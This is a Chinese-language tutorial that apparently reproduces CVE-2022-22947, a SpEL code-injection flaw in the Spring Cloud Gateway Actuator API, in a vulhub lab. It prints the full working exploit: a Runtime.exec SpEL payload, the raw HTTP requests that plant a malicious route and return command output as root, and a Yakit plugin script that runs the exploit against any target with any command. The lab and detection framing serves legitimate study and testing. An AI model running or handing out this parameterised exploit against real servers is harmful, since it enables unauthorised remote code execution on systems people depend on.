Spring Cloud Gateway Actuator API SpEL代码注入

本文主要是介绍Spring Cloud Gateway Actuator API SpEL代码注入，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

CVE-2022-22947

Spring Cloud Gateway Actuator API SpEL代码注入

影响版本

Spring Cloud Gateway 3.0.0以下，3.1.0，3.0.0~3.0.6

漏洞描述

Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由，以及提供一些强大的过滤器功能，例如: 熔断、限流、重试等。Spring Cloud Gateway的目标提供统-的路由方式且基于 Filter链的方式提供了网关基本的功能，例如:安全,监控/指标,和限流。

该漏洞是发生在Spring Cloud Gateway应用程序的Actuator接口，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。

环境搭建

进入到漏洞目录
```
cd /vulhub/spring/CVE-2022-22947
```
启动靶场
```
docker-compose up -d
```
访问网站

漏洞复现

参考文章：https://vulhub.org/#/environments/spring/CVE-2022-22947/

Yakit发送POST请求添加包含邪恶 SpEL路由，返回数据包显示路由创建成功
在这里插入图片描述
包含执行命令的代码

#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}

请求包代码如下：

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.2.152:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"
}

发送POST请求刷新网关
在这里插入图片描述

请求包代码如下：

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.2.152:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

发送GET请求检索结果
在这里插入图片描述

请求代码如下：

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.2.152:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

请求成功
在这里插入图片描述

返回数据包中包含了命令执行后的代码

uid=0(root) gid=0(root) groups=0(root)

发送DELETE请求删除恶意路由
在这里插入图片描述

代码如下：

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.2.152:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

刷新网关
在这里插入图片描述

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.2.152:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

漏洞检测

yakit新建插件（yakit—>插件管理—>插件仓库—>新插件）
在这里插入图片描述

//获取目标
target = cli.String("target")
if target == "" {die("no target")
} payload = cli.String("payload")
if target == "" {die("no payload")
} //发送第一个请求，创建恶意路由
poc.HTTP(`
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: {{params(target)}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"{{params(payload)}}\"}).getInputStream()))}"}}],"uri": "http://example.com"
}`, poc.params({"target":target,"payload":payload,}),
)//发送第二个请求，刷新路由
poc.HTTP(`POST /actuator/gateway/refresh HTTP/1.1
Host: {{params(target)}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
`, poc.params({"target":target,}),
)//发送第三个请求，检索结果
rsp, _, err := poc.HTTP(`
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: {{params(target)}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
`, poc.params({"target":target,}),
)
die(err)//获取返回数据包中的结果，进行比对
flag := "uid"
header, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp)
if str.MatchAllOfSubString(body, flag) {println("found cve-2022-22947")
} else {println("No found!")
}